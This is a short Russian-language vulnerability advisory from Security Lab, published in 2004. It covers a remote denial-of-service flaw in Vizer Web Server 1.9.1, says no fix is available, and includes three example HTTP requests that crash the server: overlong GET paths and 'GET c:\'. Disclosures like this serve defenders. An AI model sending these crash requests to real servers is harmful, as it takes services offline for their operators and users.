Security Lab

Удаленный отказ в обслуживании против Vizer web server

Дата публикации:19.02.2004
Всего просмотров:1018
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Отказ в обслуживании
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Vizer Web Server 1.9.x
Уязвимые версии: Vizer Web Server 1.9.1

Описание: Уязвимость обнаружена в Vizer web server. Удаленный пользователь может аварийно завершить работу Web сервера.

Пример:

 
GET /aaaaaa[ 250 of a ]aaa HTTP/1.1

GET /aaaaaa[ 250 of a ]aaa

GET c:\

URL производителя: http://sourceforge.net/projects/vizerwebserver/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Denial Of Service in Vizer Web Server 1.9.1